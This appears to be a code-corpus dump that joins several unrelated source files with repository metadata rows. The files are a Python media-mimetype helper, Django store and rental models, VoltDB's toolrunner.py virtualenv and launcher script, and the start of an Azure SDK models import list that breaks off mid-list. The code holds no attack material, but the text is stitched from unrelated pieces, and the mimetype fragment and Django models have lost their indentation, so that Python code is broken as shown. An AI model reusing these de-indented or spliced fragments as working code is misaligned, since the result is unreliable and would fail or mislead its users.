(AUDIO, _('Audio')),
(AUDIO_DESC, _('Audio Description')),
(CAPTIONS, _('Captions')),
]
for t in default_types:
yield t
# Mimetypes for all file extensions accepted by the front and backend uploaders
#
# OTHER USES:
# 1) To determine the mimetype to serve, based on a MediaFile's container type.
# 2) In conjunction with the container_lookup dict below to determine the
# container type for a MediaFile, based on the uploaded file's extension.
#
# XXX: The keys in this dict are sometimes treated as names for container types
# and sometimes treated as file extensions. Caveat coder.
# TODO: Replace with a more complete list or (even better) change the logic
# to detect mimetypes from something other than the file extension.
mimetype_lookup = {
u'flac': u'audio/flac',
u'mp3': u'audio/mpeg',
u'mp4': u'%s/mp4',
u'm4a': u'audio/mp4',
u'm4v': u'video/mp4',
u'ogg': u'%s/ogg',
u'oga': u'audio/ogg',
u'ogv': u'video/ogg',
u'mka': u'audio/x-matroska',
u'mkv': u'video/x-matroska',
u'3gp': u'%s/3gpp',
u'avi': u'video/avi',
u'dv': u'video/x-dv',
u'flv': u'video/x-flv', # made up, it's what everyone uses anyway.
u'mov': u'video/quicktime',
u'mpeg': u'%s/mpeg',
u'mpg': u'%s/mpeg',
u'webm': u'%s/webm',
u'wmv': u'video/x-ms-wmv',
u'm3u8': u'application/x-mpegURL',
u'xml': u'application/ttml+xml',
u'srt': u'text/plain',
}
# Default container format (and also file extension) for each mimetype we allow
# users to upload.
container_lookup = {
u'audio/flac': u'flac',
u'audio/mp4': u'mp4',
u'audio/mpeg': u'mp3',
u'audio/ogg': u'ogg',
u'audio/x-matroska': u'mka',
u'audio/webm': u'webm',
u'video/3gpp': u'3gp',
u'video/avi': u'avi',
u'video/mp4': u'mp4',
u'video/mpeg': u'mpg',
u'video/ogg': u'ogg',
u'video/quicktime': u'mov',
u'video/x-dv': u'dv',
u'video/x-flv': u'flv',
u'video/x-matroska': u'mkv',
u'video/x-ms-wmv': u'wmv',
u'video/x-vob': u'vob',
u'video/webm': u'webm',
u'application/x-mpegURL': 'm3u8',
u'application/ttml+xml': u'xml',
u'text/plain': u'srt',
}
# When media_obj.container doesn't match a key in the mimetype_lookup dict...
default_media_mimetype = 'application/octet-stream'
# File extension map to audio, video or captions
guess_media_type_map = {
'mp3': AUDIO,
'm4a': AUDIO,
'flac': AUDIO,
'mp4': VIDEO,
'm4v': VIDEO,
'ogg': VIDEO,
'oga': AUDIO,
'ogv': VIDEO,
'mka': AUDIO,
'mkv': VIDEO,
'3gp': VIDEO,
'avi': VIDEO,
'dv': VIDEO,
'flv': VIDEO,
'mov': VIDEO,
'mpeg': VIDEO,
'mpg': VIDEO,
'webm': VIDEO,
'wmv': VIDEO,
'xml': CAPTIONS,
'srt': CAPTIONS,
}
def guess_container_format(extension):
"""Return the most likely container format based on the file extension.
This standardizes to an audio/video-agnostic form of the container, if
applicable. For example m4v becomes mp4.
:param extension: the file extension, without a preceding period.
:type extension: string
:rtype: string
"""
mt = guess_mimetype(extension, default=True)
if mt is True:
return extension
return container_lookup.get(mt)
def guess_media_type(extension=None, default=VIDEO):
"""Return the most likely media type based on the container or embed site.
:param extension: The file extension without a preceding period.
:param default: Default to video if we don't have any other guess.
:returns: AUDIO, VIDEO, CAPTIONS, or None
"""
return guess_media_type_map.get(extension, default)
def guess_mimetype(container, type_=None, default=None):
"""Return the best guess mimetype for the given container.
    If the type (audio or video) is not provided, we make our best guess
    as to which it will probably be, using :func:`guess_media_type`.
Note that this value is ignored for certain mimetypes: it's useful
only when a container can be both audio and video.
:param container: The file extension
:param type_: AUDIO, VIDEO, or CAPTIONS
:param default: Default mimetype for when guessing fails
:returns: A mime string or None.
"""
if type_ is None:
type_ = guess_media_type(container)
mt = mimetype_lookup.get(container, None)
if mt is None:
return default or default_media_mimetype
try:
return mt % type_
except (ValueError, TypeError):
return mt
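# Usage sketch (illustrative; assumes the imports at the top of this module
# resolve). Expected values follow the lookup tables defined in this file.
if __name__ == '__main__':
    # 'm4v' is video-only, so no explicit type_ is needed.
    assert guess_mimetype('m4v') == 'video/mp4'
    # 'ogg' can hold audio or video; type_ selects which mimetype is built.
    assert guess_mimetype('ogg', type_=AUDIO) == 'audio/ogg'
    # Container formats are normalized to the audio/video-agnostic form.
    assert guess_container_format('m4v') == 'mp4'
    # Unknown extensions fall back to the caller-supplied default (VIDEO).
    assert guess_media_type('some-unknown-ext') == VIDEO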
| gpl-3.0 | 6,381,285,242,181,021,000 | 29.976879 | 79 | 0.641724 | false |
brayden2544/Mystuff-final | manage/models.py | 2 | 6310 | from django.db import models
from account.models import User
from django.conf import settings
from django.utils import timezone
from account import models as amod
class Store(models.Model):
active = models.BooleanField(default=True)
store_number = models.IntegerField(default=0, blank=True, null=True)
location_name = models.CharField(max_length=200, blank=True, null=True)
street = models.CharField(max_length=200, blank=True, null=True)
city = models.CharField(max_length=200, blank=True, null=True)
state = models.CharField(max_length=200, blank=True, null=True)
zip_code = models.CharField(max_length=5, blank=True, null=True)
phone = models.CharField(max_length=200, blank=True, null=True)
hours = models.CharField(max_length=200, blank=True, null=True)
#manager = models.ForeignKey(User) will use later when I add the user class
def __str__(self):
return '%i: %s' % (self.id, self.location_name)
class Category(models.Model):
category_name = models.CharField(max_length=200, blank=True, null=True)
category_description = models.CharField(max_length=500, blank=True, null=True)
def __str__(self):
return '%s' % (self.category_name)
class Brand(models.Model):
brand_name = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.brand_name)
class Catalog_Item(models.Model):
active = models.BooleanField(default=True)
sku = models.CharField(max_length=200, blank=True, null=True)
product_name = models.CharField(max_length=200, blank=True, null=True)
    availability = models.IntegerField(blank=True, null=True)
category = models.ForeignKey(Category)
brand = models.ForeignKey(Brand)
description = models.CharField(max_length=500, blank=True, null=True)
cost = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
price = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
comission_rate = models.DecimalField(max_digits=2, decimal_places=2, blank=True, null=True)
product_count = models.IntegerField(blank=True, null=True)
rentable = models.BooleanField(default = False)
daily_rent_rate = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
def __str__(self):
return '%s: %s' % (self.sku, self.product_name)
class Serial_Inventory(Catalog_Item):
serial = models.CharField(max_length=200, blank=True, null=True)
store_location = models.ForeignKey(Store)
shelf_location = models.CharField(max_length=200, blank=True, null=True)
date_purchased = models.DateTimeField(blank=True, null=True)
def __str__(self):
return '%s: %s' % (self.serial, self.product_name)
class Bulk_Inventory(Catalog_Item):
store_location = models.CharField(max_length=200, blank=True, null=True)
shelf_location = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.product_name)
class Rental(models.Model):
customer = models.ForeignKey(amod.User)
rental_item = models.ForeignKey(Catalog_Item)
date_out = models.DateField(auto_now=False, auto_now_add=False, null=True)
expected_return = models.DateField(auto_now=False, auto_now_add=False, null=True)
pre_condition = models.CharField(max_length=200, blank=True, null=True)
date_returned = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
post_condition = models.CharField(max_length=200, blank=True, null=True)
total_days_late = models.IntegerField(blank=True, null=True)
late_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
damage_report = models.CharField(max_length=200, blank=True, null=True)
damage_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
total_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
returned = models.BooleanField(default = False)
class Repair_Status(models.Model):
status = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return '%s' % (self.status)
class Repair_Item(models.Model):
customer = models.ForeignKey(amod.User)
repair_item = models.CharField(max_length=200, blank=True, null=True)
date_in = models.DateField(auto_now=False, auto_now_add=False, null=True)
expected_return = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
issue = models.CharField(max_length=200, blank=True, null=True)
status = models.ForeignKey(Repair_Status)
damage_report = models.CharField(max_length=200, blank=True, null=True)
date_returned = models.DateField(auto_now=False, auto_now_add=False, blank=True, null=True)
repairs = models.CharField(max_length=200, blank=True, null=True)
repair_fees = models.DecimalField(max_digits=6, decimal_places=2, blank=True, null=True)
returned = models.BooleanField(default = False)
paid_for = models.BooleanField(default = False)
#Accounts
class BalanceSheetAccounts(models.Model):
account_name = models.CharField(max_length=200, blank=True, null=True)
class Inventory(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class Cash(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class PrepaidServiceLiability(BalanceSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class IncomeSheetAccounts(models.Model):
account_name = models.CharField(max_length=200, blank=True, null=True)
date = models.CharField(max_length=200, blank=True, null=True)
class Revenue(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class ComissionsExpense(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
class SalesTaxPayable(IncomeSheetAccounts):
balance = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True)
| apache-2.0 | -1,022,488,772,565,956,200 | 43.125874 | 98 | 0.712995 | false |
migue/voltdb | tools/toolrunner.py | 2 | 19296 | # This file is part of VoltDB.
# Copyright (C) 2008-2017 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# Performs the initialization "grunt" work for various voltcli tool scripts.
#
# It assumes a relative location in a root subdirectory of a voltdb
# distribution. The logic is minimal since the heavy lifting happens in
# runner.main(). The calling script name determines the verbs that are loaded
# from <name>.d subdirectories. It loads the version number from version.txt in
# the script's parent directory. It supports using a virtual environment with
# custom auto-installed libraries.
#
# main() starts with the system Python libraries.
# vmain() starts in an isolated virtual environment with custom libraries.
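#
# Usage sketch (illustrative; 'voltfoo' is a hypothetical tool name): a thin
# wrapper script placed next to a 'voltfoo.d' verb folder would simply call
#
#   import toolrunner
#   toolrunner.main(description='VoltDB foo tool')
#
# or, when extra Python packages must be auto-installed into the virtual
# environment first,
#
#   toolrunner.vmain(description='VoltDB foo tool', packages=['requests'])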
import sys
import os
import subprocess
import shutil
import re
import glob
import copy
class G:
"""
Globals.
"""
script = os.path.realpath(sys.argv[0])
script_dir, script_name = os.path.split(script)
base_dir = os.path.dirname(script_dir)
# Use ~/.<script> as the output directory for logging and virtual environments.
user_dir = os.path.expanduser(os.path.join('~', '.voltdb'))
log_path = os.path.join(user_dir, 'logs', '%s.log' % script_name)
module_path = os.path.realpath(__file__)
# Opened by main() and vmain()
log_file = None
verbose = False
# Full path glob of virtualenv packages. The latest is chosen based on the parsed version number.
virtualenv_package_glob = os.path.join(base_dir, 'third_party', 'python', 'packages', 'virtualenv-*.tar.gz')
virtualenv_parse_re = re.compile('^.*/(virtualenv-([0-9.]+))[.]tar[.]gz$')
def get_version(base_dir, error_abort=True):
try:
# noinspection PyUnresolvedReferences
return open(os.path.join(base_dir, 'version.txt')).read().strip()
except (IOError, OSError), e:
if error_abort:
abort('Unable to read version.txt.', e)
return None
def go(cmd_name,
cmd_dir,
base_dir,
description,
standalone,
directory,
verbose,
libpath,
*args):
"""
Run tool after tweaking the Python library path to find voltcli libraries.
Optionally change to a relative or absolute directory provided by the
caller. The base directory is this file's parent directory and serves as
the default working directory.
:param cmd_name:
:param cmd_dir:
:param base_dir:
:param description:
:param standalone:
:param directory:
:param verbose:
:param libpath:
:param args:
"""
    # Arguments arrive as strings when re-exec'd from vmain(); normalize.
    G.verbose = to_boolean(verbose)
# Append libpath to module loading path.
if libpath:
sys.path.extend(libpath.split(':'))
start_logging()
try:
version = get_version(base_dir)
if os.path.isdir('/opt/lib/voltdb/python'):
sys.path.insert(0, '/opt/lib/voltdb/python')
if os.path.isdir('/usr/share/lib/voltdb/python'):
sys.path.insert(0, '/usr/share/lib/voltdb/python')
if os.path.isdir('/usr/lib/voltdb/python'):
sys.path.insert(0, '/usr/lib/voltdb/python')
# Library location relative to script.
sys.path.insert(0, os.path.join(base_dir, 'lib', 'python'))
if directory:
os.chdir(directory)
runner = None
try:
# noinspection PyUnresolvedReferences
from voltcli import runner
except ImportError:
abort('Unable to import voltcli.runner using the following path:', sys.path)
runner.main(cmd_name, cmd_dir, version, description,
standalone=to_boolean(standalone), *args)
finally:
stop_logging()
def main(description='(no description)',
standalone=False,
directory=None,
verbose=False,
libpath='',
command_name=None):
"""
Main entry point for commands not running in a virtual environment.
:param description:
:param standalone:
:param directory:
:param verbose:
:param libpath:
"""
cmd_path = sys.argv[0]
cmd_dir, cmd_name = os.path.split(os.path.realpath(cmd_path))
    if command_name is not None:
cmd_name = command_name
base_dir = os.path.dirname(cmd_dir)
go(cmd_name, cmd_dir, base_dir, description, standalone, directory, verbose, libpath, *sys.argv[1:])
def get_virtualenv():
"""
Find the virtualenv runtime. Fall back to using one from
third_party/python/packages. Untar it under the working folder. Return a
command line argument list.
"""
virtualenv = find_in_path('virtualenv', required=False)
if virtualenv:
return [virtualenv]
# Find the latest package.
latest_version = []
latest_package_path = None
latest_package_name = None
for package_path in glob.glob(G.virtualenv_package_glob):
m = G.virtualenv_parse_re.match(package_path)
if m:
version = [int(i) for i in m.group(2).split('.')]
# Zero-pad the versions for comparison.
if len(version) > len(latest_version):
latest_version.extend([0] * (len(version) - len(latest_version)))
elif len(latest_version) > len(version):
version.extend([0] * (len(latest_version) - len(version)))
for iv in range(len(version)):
if version[iv] > latest_version[iv]:
latest_version = copy.copy(version)
latest_package_path = package_path
latest_package_name = m.group(1)
break
elif version[iv] < latest_version[iv]:
break
else:
warning('Failed to parse virtualenv package path: %s' % package_path)
if not latest_package_path:
abort('virtualenv is missing.', 'See https://pypi.python.org/pypi/virtualenv.')
info('Unpacking the distribution copy of virtualenv:', [latest_package_path])
returncode = os.system('tar xf "%s"' % latest_package_path)
if returncode != 0:
abort('Failed to extract the virtualenv package.')
return ['python', os.path.join(os.getcwd(), latest_package_name, 'virtualenv.py')]
# Internal function to build/rebuild the virtual environment
def _build_virtual_environment(venv_dir, version, packages):
# Wipe any existing virtual environment directory.
if os.path.exists(venv_dir):
try:
shutil.rmtree(venv_dir)
except (IOError, OSError), e:
abort('Failed to remove existing virtual environment.', (venv_dir, e))
# Create the directory as needed.
if not os.path.isdir(venv_dir):
os.makedirs(venv_dir)
# Save version.txt in the venv root directory.
try:
version_path = os.path.join(venv_dir, 'version.txt')
f = open(version_path, 'w')
try:
try:
f.write(version)
except (IOError, OSError), e:
abort('Failed to write version file.', (version_path, e))
finally:
f.close()
except (IOError, OSError), e:
abort('Failed to open version file for writing.', (version_path, e))
# Prefer to use the system virtualenv, but fall back to the third_party copy.
save_dir = os.getcwd()
save_lc_all = os.environ.get('LC_ALL', None)
# Makes sure a pip failure provides clean output instead of a Unicode error.
os.environ['LC_ALL'] = 'C'
try:
os.chdir(os.path.dirname(venv_dir))
args = get_virtualenv()
pip = os.path.join(venv_dir, 'bin', 'pip')
info('Preparing the %s Python virtual environment:' % G.script_name, [
'(an Internet connection is required)',
'Folder: %s' % venv_dir])
args += ['--clear', '--system-site-packages', sys.platform]
run_cmd(*args)
if packages:
for package in packages:
info('Installing virtual environment package: %s' % package)
run_cmd(pip, 'install', package)
finally:
os.chdir(save_dir)
if save_lc_all is None:
del os.environ['LC_ALL']
else:
os.environ['LC_ALL'] = save_lc_all
def vmain(description='(no description)',
standalone=False,
directory='',
packages=None,
verbose=False,
libpath=''):
"""
Main entry point for commands running in an auto-generated virtual environment.
:param description:
:param standalone:
:param directory:
:param packages:
:param verbose:
"""
G.verbose = verbose
start_logging()
# Set up virtual environment under home since it should be write-able.
output_dir = os.path.join(G.user_dir, G.script_name)
# Make sure the output directory is available.
if not os.path.isdir(output_dir):
if os.path.exists(output_dir):
abort('Output path "%s" exists, but is not a directory.' % output_dir,
'Please move or delete it before running this command again.')
try:
os.makedirs(output_dir)
except (IOError, OSError), e:
abort('Output path "%s" exists, but is not a directory.' % output_dir,
'Please move or delete it before running this command again.', e)
venv_base = os.path.join(output_dir, 'venv')
venv_dir = os.path.join(venv_base, sys.platform)
venv_complete = False
version = get_version(os.path.dirname(G.script_dir))
try:
build_venv = not os.path.isdir(venv_dir)
if not build_venv:
# If the virtual environment is present check that it's current.
# If version.txt is not present leave it alone so that we don't
# get in the situation where the virtual environment gets
# recreated every time.
venv_version = get_version(venv_dir, error_abort=False)
if venv_version is None:
warning('Unable to read the version file:',
[os.path.join(venv_dir, 'version.txt')],
'Assuming that the virtual environment is current.',
'To force a rebuild delete the virtual environment base directory:',
[venv_base])
else:
build_venv = venv_version != version
if build_venv:
_build_virtual_environment(venv_dir, version, packages)
venv_complete = True
# Exec the toolrunner.py script inside the virtual environment by using
# the virtual environment's Python.
python = os.path.join(venv_dir, 'bin', 'python')
args = [
python,
G.module_path,
G.script_name,
G.script_dir,
os.path.dirname(G.script_dir),
str(description),
str(standalone),
str(directory),
str(verbose),
libpath,
] + sys.argv[1:]
verbose_info('Re-starting with virtual environment:', args)
os.execvp(python, args)
except KeyboardInterrupt:
sys.stderr.write('\n<break>\n')
finally:
stop_logging()
# Avoid confusion by cleaning up incomplete virtual environments.
if not venv_complete and os.path.exists(venv_dir):
warning('Removing incomplete virtual environment after installation failure ...')
shutil.rmtree(venv_dir, True)
def to_boolean(value):
"""
Utility function to convert a value to boolean.
:param value:
"""
# noinspection PyBroadException
try:
# Raises AttributeError if lower() is called on a bool.
        return value.lower() == 'true'
except:
return bool(value)
def start_logging():
"""
Open log file.
"""
base_dir = os.path.dirname(G.log_path)
if not os.path.exists(base_dir):
try:
os.makedirs(base_dir)
except (IOError, OSError), e:
abort('Failed to create log directory.', (base_dir, e))
try:
G.log_file = open(G.log_path, 'w')
except (IOError, OSError), e:
abort('Failed to open log file.', G.log_path, e)
def stop_logging():
"""
Close log file.
"""
if G.log_file:
G.log_file.close()
G.log_file = None
def find_in_path(name, required=False):
"""
Find program in the system path.
:rtype : str
"""
# NB: Won't work on Windows.
for dir_path in os.environ['PATH'].split(':'):
if os.path.exists(os.path.join(dir_path, name)):
return os.path.join(dir_path, name)
if required:
abort('Command "%s" not found in path:' % name, os.environ['PATH'].split(':'))
return None
def pipe_cmd(*args):
"""
Run program, capture output, and yield each output line for iteration.
"""
try:
verbose_info('Running external command:', args)
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in iter(proc.stdout.readline, ''):
yield False, line.rstrip()
for line in iter(proc.stderr.readline, ''):
yield True, line.rstrip()
proc.stdout.close()
proc.stderr.close()
returncode = proc.wait()
if returncode != 0:
abort('Command failed with return code %d:' % returncode, (' '.join(args),))
except Exception, e:
abort('Exception running command: %s' % ' '.join(args), e)
def run_cmd(*args):
"""
Run program and capture output in the log file.
"""
for is_error, line in pipe_cmd(*args):
if G.log_file:
if is_error:
s = '[ERROR] %s\n' % line
G.log_file.write(s)
sys.stderr.write(s)
else:
s = '%s\n' % line
G.log_file.write(s)
if G.verbose:
sys.stdout.write(s)
G.log_file.flush()
else:
sys.stdout.write(line)
sys.stdout.write('\n')
def is_string(item):
"""
Return True if the item behaves like a string.
:type item: str
:param item:
"""
try:
# noinspection PyUnusedLocal
v = item + ''
return True
except TypeError:
return False
def output_messages(msgs, f=sys.stdout, tag=None, level=0):
"""
Low level message display.
:param msgs:
:param f:
:param tag:
:param level:
"""
def write(s):
f.write(s)
if G.log_file:
G.log_file.write(s)
G.log_file.flush()
if tag:
stag = '%8s: ' % tag
else:
stag = ''
# msgs can be a single string or an iterable object.
if is_string(msgs):
msgs = [msgs]
sindent = level * ' '
# Recursively process message list and sub-lists.
for msg in msgs:
if msg is not None:
# Handle exceptions
if issubclass(msg.__class__, Exception):
write('%s%s%s Exception: %s\n' % (stag, sindent, msg.__class__.__name__, str(msg)))
else:
# Handle multi-line strings
if is_string(msg):
# If it is a string slice and dice it by linefeeds.
for msg2 in msg.split('\n'):
write('%s%s%s\n' % (stag, sindent, msg2))
else:
# Recursively display an iterable with indentation added.
if hasattr(msg, '__iter__'):
output_messages(msg, f=f, tag=tag, level=level + 1)
else:
for msg2 in str(msg).split('\n'):
write('%s%s%s\n' % (stag, sindent, msg2))
def info(*msgs):
"""
Display INFO level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='INFO')
def verbose_info(*msgs):
"""
Display verbose INFO level messages if enabled.
:type msgs: list
:param msgs:
"""
if G.verbose:
output_messages(msgs, tag='INFO2')
def warning(*msgs):
"""
Display WARNING level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='WARNING')
def error(*msgs):
"""
Display ERROR level messages.
:type msgs: list
:param msgs:
"""
output_messages(msgs, tag='ERROR')
def abort(*msgs):
"""
Display ERROR messages and then abort.
:type msgs: list
:param msgs:
"""
error(*msgs)
if G.log_file:
info('See log file "%s" for more details.' % G.log_path)
sys.stderr.write('\n')
output_messages('Exiting.', f=sys.stderr, tag='FATAL')
stop_logging()
sys.exit(1)
def env_path_fix(envvar, check_folders, check_globs):
"""
Add folder as needed to an environment path variable if file or files
can't be resolved without it. Return True if resolved.
"""
found_in_folder = None
# Look for files in existing and additional folders.
path_folders = [f for f in os.environ.get(envvar, '').split(':') if f]
for folder in path_folders + check_folders:
for check_glob in check_globs:
if glob.glob(os.path.join(folder, check_glob)):
found_in_folder = folder
if found_in_folder:
break
# Add to the path as needed.
if found_in_folder:
        if found_in_folder not in path_folders:
os.environ[envvar] = ':'.join(path_folders + [found_in_folder])
else:
warning('Unable to resolve files using the "%s" environment variable.' % envvar)
warning('Files to resolve:', check_globs)
if path_folders:
warning('Existing "%s" folders:' % envvar, path_folders)
if check_folders:
warning('Additional folders checked:', check_folders)
    return found_in_folder is not None
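# Usage sketch (hypothetical folder and glob): ensure LD_LIBRARY_PATH can
# resolve a native library, adding a candidate folder only if needed:
#   env_path_fix('LD_LIBRARY_PATH', ['/opt/voltdb/lib'], ['libvolt*.so*'])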
if __name__ == '__main__':
# vmain() re-exec's this script after setting up a virtual environment.
# Since it runs with the virtual environment Python and libraries, just
# call the main() here. It will convert CLI string arguments as needed.
go(*sys.argv[1:])
| agpl-3.0 | -6,562,185,719,734,969,000 | 33.767568 | 112 | 0.599502 | false |
Azure/azure-sdk-for-python | sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2019_03_01/models/__init__.py | 1 | 35488 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AccessUri
from ._models_py3 import AdditionalCapabilities
from ._models_py3 import AdditionalUnattendContent
from ._models_py3 import ApiEntityReference
from ._models_py3 import ApiError
from ._models_py3 import ApiErrorBase
from ._models_py3 import AutomaticOSUpgradePolicy
from ._models_py3 import AutomaticOSUpgradeProperties
from ._models_py3 import AutomaticRepairsPolicy
from ._models_py3 import AvailabilitySet
from ._models_py3 import AvailabilitySetListResult
from ._models_py3 import AvailabilitySetUpdate
from ._models_py3 import BillingProfile
from ._models_py3 import BootDiagnostics
from ._models_py3 import BootDiagnosticsInstanceView
from ._models_py3 import ComputeOperationListResult
from ._models_py3 import ComputeOperationValue
from ._models_py3 import CreationData
from ._models_py3 import DataDisk
from ._models_py3 import DataDiskImage
from ._models_py3 import DedicatedHost
from ._models_py3 import DedicatedHostAllocatableVM
from ._models_py3 import DedicatedHostAvailableCapacity
from ._models_py3 import DedicatedHostGroup
from ._models_py3 import DedicatedHostGroupListResult
from ._models_py3 import DedicatedHostGroupUpdate
from ._models_py3 import DedicatedHostInstanceView
from ._models_py3 import DedicatedHostListResult
from ._models_py3 import DedicatedHostUpdate
from ._models_py3 import DiagnosticsProfile
from ._models_py3 import DiffDiskSettings
from ._models_py3 import Disallowed
from ._models_py3 import Disk
from ._models_py3 import DiskEncryptionSettings
from ._models_py3 import DiskInstanceView
from ._models_py3 import DiskList
from ._models_py3 import DiskSku
from ._models_py3 import DiskUpdate
from ._models_py3 import EncryptionSettingsCollection
from ._models_py3 import EncryptionSettingsElement
from ._models_py3 import Gallery
from ._models_py3 import GalleryApplication
from ._models_py3 import GalleryApplicationList
from ._models_py3 import GalleryApplicationVersion
from ._models_py3 import GalleryApplicationVersionList
from ._models_py3 import GalleryApplicationVersionPublishingProfile
from ._models_py3 import GalleryArtifactPublishingProfileBase
from ._models_py3 import GalleryArtifactSource
from ._models_py3 import GalleryDataDiskImage
from ._models_py3 import GalleryDiskImage
from ._models_py3 import GalleryIdentifier
from ._models_py3 import GalleryImage
from ._models_py3 import GalleryImageIdentifier
from ._models_py3 import GalleryImageList
from ._models_py3 import GalleryImageVersion
from ._models_py3 import GalleryImageVersionList
from ._models_py3 import GalleryImageVersionPublishingProfile
from ._models_py3 import GalleryImageVersionStorageProfile
from ._models_py3 import GalleryList
from ._models_py3 import GalleryOSDiskImage
from ._models_py3 import GrantAccessData
from ._models_py3 import HardwareProfile
from ._models_py3 import Image
from ._models_py3 import ImageDataDisk
from ._models_py3 import ImageDiskReference
from ._models_py3 import ImageListResult
from ._models_py3 import ImageOSDisk
from ._models_py3 import ImagePurchasePlan
from ._models_py3 import ImageReference
from ._models_py3 import ImageStorageProfile
from ._models_py3 import ImageUpdate
from ._models_py3 import InnerError
from ._models_py3 import InstanceViewStatus
from ._models_py3 import KeyVaultAndKeyReference
from ._models_py3 import KeyVaultAndSecretReference
from ._models_py3 import KeyVaultKeyReference
from ._models_py3 import KeyVaultSecretReference
from ._models_py3 import LinuxConfiguration
from ._models_py3 import ListUsagesResult
from ._models_py3 import LogAnalyticsInputBase
from ._models_py3 import LogAnalyticsOperationResult
from ._models_py3 import LogAnalyticsOutput
from ._models_py3 import MaintenanceRedeployStatus
from ._models_py3 import ManagedArtifact
from ._models_py3 import ManagedDiskParameters
from ._models_py3 import NetworkInterfaceReference
from ._models_py3 import NetworkProfile
from ._models_py3 import OSDisk
from ._models_py3 import OSDiskImage
from ._models_py3 import OSProfile
from ._models_py3 import Plan
from ._models_py3 import ProximityPlacementGroup
from ._models_py3 import ProximityPlacementGroupListResult
from ._models_py3 import ProximityPlacementGroupUpdate
from ._models_py3 import PurchasePlan
from ._models_py3 import RecommendedMachineConfiguration
from ._models_py3 import RecoveryWalkResponse
from ._models_py3 import RegionalReplicationStatus
from ._models_py3 import ReplicationStatus
from ._models_py3 import RequestRateByIntervalInput
from ._models_py3 import Resource
from ._models_py3 import ResourceRange
from ._models_py3 import RollbackStatusInfo
from ._models_py3 import RollingUpgradePolicy
from ._models_py3 import RollingUpgradeProgressInfo
from ._models_py3 import RollingUpgradeRunningStatus
from ._models_py3 import RollingUpgradeStatusInfo
from ._models_py3 import RunCommandDocument
from ._models_py3 import RunCommandDocumentBase
from ._models_py3 import RunCommandInput
from ._models_py3 import RunCommandInputParameter
from ._models_py3 import RunCommandListResult
from ._models_py3 import RunCommandParameterDefinition
from ._models_py3 import RunCommandResult
from ._models_py3 import ScaleInPolicy
from ._models_py3 import ScheduledEventsProfile
from ._models_py3 import Sku
from ._models_py3 import Snapshot
from ._models_py3 import SnapshotList
from ._models_py3 import SnapshotSku
from ._models_py3 import SnapshotUpdate
from ._models_py3 import SourceVault
from ._models_py3 import SshConfiguration
from ._models_py3 import SshPublicKey
from ._models_py3 import StorageProfile
from ._models_py3 import SubResource
from ._models_py3 import SubResourceReadOnly
from ._models_py3 import TargetRegion
from ._models_py3 import TerminateNotificationProfile
from ._models_py3 import ThrottledRequestsInput
from ._models_py3 import UpdateResource
from ._models_py3 import UpgradeOperationHistoricalStatusInfo
from ._models_py3 import UpgradeOperationHistoricalStatusInfoProperties
from ._models_py3 import UpgradeOperationHistoryStatus
from ._models_py3 import UpgradePolicy
from ._models_py3 import Usage
from ._models_py3 import UsageName
from ._models_py3 import UserArtifactManage
from ._models_py3 import UserArtifactSource
from ._models_py3 import UserAssignedIdentitiesValue
from ._models_py3 import VMScaleSetConvertToSinglePlacementGroupInput
from ._models_py3 import VaultCertificate
from ._models_py3 import VaultSecretGroup
from ._models_py3 import VirtualHardDisk
from ._models_py3 import VirtualMachine
from ._models_py3 import VirtualMachineAgentInstanceView
from ._models_py3 import VirtualMachineCaptureParameters
from ._models_py3 import VirtualMachineCaptureResult
from ._models_py3 import VirtualMachineExtension
from ._models_py3 import VirtualMachineExtensionHandlerInstanceView
from ._models_py3 import VirtualMachineExtensionImage
from ._models_py3 import VirtualMachineExtensionInstanceView
from ._models_py3 import VirtualMachineExtensionUpdate
from ._models_py3 import VirtualMachineExtensionsListResult
from ._models_py3 import VirtualMachineHealthStatus
from ._models_py3 import VirtualMachineIdentity
